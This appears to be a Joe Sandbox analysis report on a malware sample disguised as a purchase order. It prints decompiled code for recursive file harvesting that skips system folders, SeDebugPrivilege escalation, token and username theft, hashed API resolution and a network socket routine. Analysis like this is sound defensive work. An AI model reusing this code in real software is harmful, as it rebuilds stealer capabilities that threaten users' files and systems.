10342->10350 10363 404ada 10342->10363 10345 404ada 4 API calls 10346 411cad 10345->10346 10347 411f0c 10346->10347 10348 411cc0 10346->10348 10349 402bab 2 API calls 10347->10349 10366 405eb6 10348->10366 10349->10350 10350->10328 10350->10339 10352 411d3c 10353 4031e5 4 API calls 10352->10353 10361 411d7b 10353->10361 10354 411ea6 10355 4031e5 4 API calls 10354->10355 10356 411eb5 10355->10356 10357 4031e5 4 API calls 10356->10357 10358 411ed6 10357->10358 10359 405eb6 4 API calls 10358->10359 10359->10350 10360 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10360->10361 10361->10354 10361->10360 10362 405eb6 4 API calls 10361->10362 10362->10361 10364 4031e5 4 API calls 10363->10364 10365 404afd 10364->10365 10365->10345 10367 405998 4 API calls 10366->10367 10368 405ec8 10367->10368 10368->10352 9631 40f6b8 9632 41219c 14 API calls 9631->9632 9633 40f6c7 9632->9633 9634 41219c 14 API calls 9633->9634 9635 40f6d5 9634->9635 9636 41219c 14 API calls 9635->9636 9637 40f6df 9636->9637 9656 40d6bd 9657 4056bf 2 API calls 9656->9657 9658 40d6c9 9657->9658 9669 404cbf 9658->9669 9661 404cbf 8 API calls 9662 40d6f4 9661->9662 9663 404cbf 8 API calls 9662->9663 9664 40d702 9663->9664 9665 413aca 4 API calls 9664->9665 9666 40d711 9665->9666 9667 405695 2 API calls 9666->9667 9668 40d71f 9667->9668 9670 402b7c 2 API calls 9669->9670 9671 404ccd 9670->9671 9672 404ddc 9671->9672 9673 404b8f 5 API calls 9671->9673 9672->9661 9674 404ce4 9673->9674 9675 404dd4 9674->9675 9677 402b7c 2 API calls 9674->9677 9676 402bab 2 API calls 9675->9676 9676->9672 9684 404d04 9677->9684 9678 404dcc 9679 404a39 5 API calls 9678->9679 9679->9675 9680 404dc6 9682 402bab 2 API calls 9680->9682 9681 402b7c 2 API calls 9681->9684 9682->9678 9683 404b8f 5 API calls 9683->9684 9684->9678 9684->9680 9684->9681 9684->9683 9685 402bab GetProcessHeap RtlFreeHeap 9684->9685 9686 404a39 5 API calls 9684->9686 9687 405b6f 6 API calls 9684->9687 9688 404cbf 8 API calls 9684->9688 9685->9684 9686->9684 9687->9684 9688->9684 9689 40f0bf 9690 4056bf 2 API calls 9689->9690 9691 40f0c9 9690->9691 9692 40f115 9691->9692 9694 404cbf 8 API calls 9691->9694 9693 41219c 14 API calls 9692->9693 9695 40f128 9693->9695 9696 40f0ed 9694->9696 9697 404cbf 8 API calls 9696->9697 9698 40f0fb 9697->9698 9699 413aca 4 API calls 9698->9699 9700 40f10a 9699->9700 9701 405695 2 API calls 9700->9701 9701->9692

                      Executed Functions

                      Function 00403D74, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 159 403dd1-403dd8 151->159 160 403e9d-403ea4 call 402bab 151->160 154 403f97-403f9d 152->154 161 403ee8-403ef8 call 405d24 153->161 162 403f8e-403f94 call 402bab 153->162 166 403e75-403e90 call 4031e5 FindNextFileW 159->166 167 403dde-403de2 159->167 160->150 175 403f03-403f0a 161->175 176 403efa-403f01 161->176 162->152 166->159 179 403e96-403e97 call 403bef 166->179 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 188 403e30-403e4c call 405b6f 172->188 189 403e24-403e2e 172->189 173->166 185 403dfb-403e10 call 405eff 173->185 181 403f12-403f2d call 405b6f 175->181 182 403f0c-403f10 175->182 176->175 180 403f41-403f5c call 4031e5 FindNextFileW 176->180 193 403e9c 179->193 196 403f87-403f88 call 403bef 180->196 197 403f5e-403f61 180->197 181->180 199 403f2f-403f33 181->199 182->180 182->181 185->166 185->172 188->166 203 403e4e-403e6f call 403d74 call 402bab 188->203 189->166 189->188 193->160 207 403f8d 196->207 197->161 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 207->162 209->180 217->154
                      C-Code - Quality: 85%
                      			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				void* _t40;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t40 = E00405B6F(_t124, L"%s\\%s", _a4); // executed
								_t101 = _t40;
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}





















                      0x00403d82
                      0x00403d88
                      0x00403d8c
                      0x00403d8d
                      0x00403d90
                      0x00403ea9
                      0x00403ea9
                      0x00403eb9
                      0x00403ebb
                      0x00403ec0
                      0x00403f95
                      0x00403f95
                      0x00000000
                      0x00403f95
                      0x00403ece
                      0x00403edb
                      0x00403edd
                      0x00403ee2
                      0x00403f8e
                      0x00403f8f
                      0x00000000
                      0x00403f94
                      0x00000000
                      0x00403ee8
                      0x00403ef8
                      0x00403f0a
                      0x00403f12
                      0x00403f18
                      0x00403f21
                      0x00403f26
                      0x00403f28
                      0x00403f2d
                      0x00000000
                      0x00000000
                      0x00403f33
                      0x00403f76
                      0x00403f7c
                      0x00000000
                      0x00403f83
                      0x00403f36
                      0x00403f3a
                      0x00000000
                      0x00403f40
                      0x00403f0c
                      0x00403f10
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403f41
                      0x00403f41
                      0x00403f4b
                      0x00403f58
                      0x00403f5c
                      0x00403f88
                      0x00000000
                      0x00403f8d
                      0x00403f60
                      0x00000000
                      0x00403f60
                      0x00403ef8
                      0x00403ee8
                      0x00403da3
                      0x00403da9
                      0x00403ea6
                      0x00403ea8
                      0x00000000
                      0x00403ea8
                      0x00403db7
                      0x00403dc4
                      0x00403dc6
                      0x00403dcb
                      0x00403e9d
                      0x00403e9e
                      0x00403ea4
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403dd1
                      0x00403dd1
                      0x00403dd8
                      0x00000000
                      0x00000000
                      0x00403de2
                      0x00403e12
                      0x00403e22
                      0x00403e30
                      0x00403e36
                      0x00403e3f
                      0x00403e44
                      0x00403e47
                      0x00403e4a
                      0x00403e4c
                      0x00000000
                      0x00000000
                      0x00403e63
                      0x00403e65
                      0x00403e6a
                      0x00403e6f
                      0x00403f64
                      0x00403f6a
                      0x00000000
                      0x00403f71
                      0x00000000
                      0x00403e6f
                      0x00403e26
                      0x00403e27
                      0x00403e2e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403e2e
                      0x00403dea
                      0x00403df9
                      0x00000000
                      0x00000000
                      0x00403e01
                      0x00403e10
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403e75
                      0x00403e7f
                      0x00403e8c
                      0x00403e8e
                      0x00403e97
                      0x00000000

                      APIs
                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileFind$FirstNext
                      • String ID: %s\%s$%s\*$Program Files$Windows
                      • API String ID: 1690352074-2009209621
                      • Opcode ID: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                      • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                      • Opcode Fuzzy Hash: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                      • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040650A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                      Download Yara Rule
                      C-Code - Quality: 78%
                      			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}













                      0x00406512
                      0x00406514
                      0x00406522
                      0x00406524
                      0x00406530
                      0x00406534
                      0x0040653f
                      0x0040654e
                      0x00406552
                      0x0040655a
                      0x0040655f
                      0x0040656d
                      0x00406570
                      0x00406573
                      0x0040657a
                      0x00406589
                      0x0040658d
                      0x00406590
                      0x00406594
                      0x00000000
                      0x0040659a
                      0x004065a1

                      APIs
                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                      • String ID: SeDebugPrivilege
                      • API String ID: 3615134276-2896544425
                      • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                      • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                      • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                      • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}





                      0x00402b8c
                      0x00402b92
                      0x00402b96
                      0x00402b9e
                      0x00402ba3
                      0x00402baa

                      APIs
                      • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcess
                      • String ID:
                      • API String ID: 1357844191-0
                      • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                      • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                      • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                      • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}





                      0x00406077
                      0x00406082
                      0x00406085

                      APIs
                      • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: NameUser
                      • String ID:
                      • API String ID: 2645101109-0
                      • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                      • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                      • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                      • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404ED4, Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                      Download Yara Rule
                      APIs
                      • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: recv
                      • String ID:
                      • API String ID: 1507349165-0
                      • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                      • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                      • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                      • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004061C3, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 238 40624c-406258 call 402b7c 230->238 239 40623d-406249 call 40338c 230->239 234 406329-40632e 231->234 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 238->246 247 40625a-406266 call 40338c 238->247 239->238 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 265 4062a2-4062b9 call 406086 253->265 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 266 40630c 256->266 258 406311-406317 call 402bab 257->258 259 406318-40631e 257->259 258->259 263 406320-406326 call 402bab 259->263 264 406327 259->264 263->264 264->234 272 4062f5-4062fd call 402bab 265->272 273 4062bb-4062df call 4031e5 265->273 266->257 272->254 278 4062e2-4062e4 273->278 278->272 279 4062e6-4062f3 call 405b6f 278->279 279->272
                      C-Code - Quality: 75%
                      			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}


























                      0x004061c3
                      0x004061cb
                      0x004061cd
                      0x004061d0
                      0x004061de
                      0x004061e0
                      0x004061e5
                      0x004061e9
                      0x004061eb
                      0x004061ed
                      0x004061f2
                      0x0040622a
                      0x00406230
                      0x00406235
                      0x00406239
                      0x0040623b
                      0x00406244
                      0x00406249
                      0x00406249
                      0x0040624c
                      0x00406253
                      0x00406256
                      0x00406258
                      0x00406261
                      0x00406266
                      0x00406266
                      0x00406270
                      0x00406273
                      0x00406276
                      0x0040627b
                      0x0040627e
                      0x0040628c
                      0x0040628e
                      0x00406290
                      0x00406295
                      0x0040629a
                      0x0040629e
                      0x004062a0
                      0x004062ac
                      0x004062af
                      0x004062b7
                      0x004062b9
                      0x004062c9
                      0x004062e0
                      0x004062e2
                      0x004062e4
                      0x004062f3
                      0x004062f3
                      0x004062e4
                      0x004062f8
                      0x004062fd
                      0x004062a0
                      0x004062fe
                      0x00406302
                      0x00406307
                      0x0040630c
                      0x0040630d
                      0x0040630f
                      0x00406312
                      0x00406317
                      0x00406318
                      0x0040631c
                      0x0040631e
                      0x00406321
                      0x00406326
                      0x00000000
                      0x00406327
                      0x004061f4
                      0x004061ff
                      0x00406208
                      0x00406218
                      0x0040621d
                      0x00406224
                      0x00406226
                      0x00406228
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406228
                      0x00406201
                      0x00000000

                      APIs
                      • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                      • _wmemset.LIBCMT ref: 00406244
                      • _wmemset.LIBCMT ref: 00406261
                      • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: _wmemset$ErrorInformationLastToken
                      • String ID: IDA$IDA
                      • API String ID: 487585393-2020647798
                      • Opcode ID: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
                      • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                      • Opcode Fuzzy Hash: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
                      • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 552 404ec7-404ec9 542->552 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 549 404ec0-404ec6 call 402bab 545->549 550 404ecb 545->550 546->545 549->552 551 404ecd-404ece 550->551 551->539 552->551
                      C-Code - Quality: 37%
                      			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

















                      0x00404e1d
                      0x00404e26
                      0x00404e2a
                      0x00404e2f
                      0x00404e37
                      0x00404e3a
                      0x00404e45
                      0x00404e4f
                      0x00404e57
                      0x00404e61
                      0x00404e66
                      0x00404e68
                      0x00404e6c
                      0x00404e6e
                      0x00404e7a
                      0x00404e80
                      0x00404e84
                      0x00404e9f
                      0x00404ea7
                      0x00404eab
                      0x00404eb1
                      0x00404eb1
                      0x00404eb6
                      0x00404ebe
                      0x00404ecb
                      0x00000000
                      0x00404ec0
                      0x00404ec1
                      0x00404ec7
                      0x00404ec7
                      0x00404ecd
                      0x00000000
                      0x00404ece
                      0x00404ebe
                      0x00404e87
                      0x00404e90
                      0x00000000
                      0x00404e90
                      0x00000000

                      APIs
                      • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                      • socket.WS2_32(?,?,?), ref: 00404E7A
                      • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: freeaddrinfogetaddrinfosocket
                      • String ID:
                      • API String ID: 2479546573-0
                      • Opcode ID: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
                      • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                      • Opcode Fuzzy Hash: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
                      • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                      Uniqueness

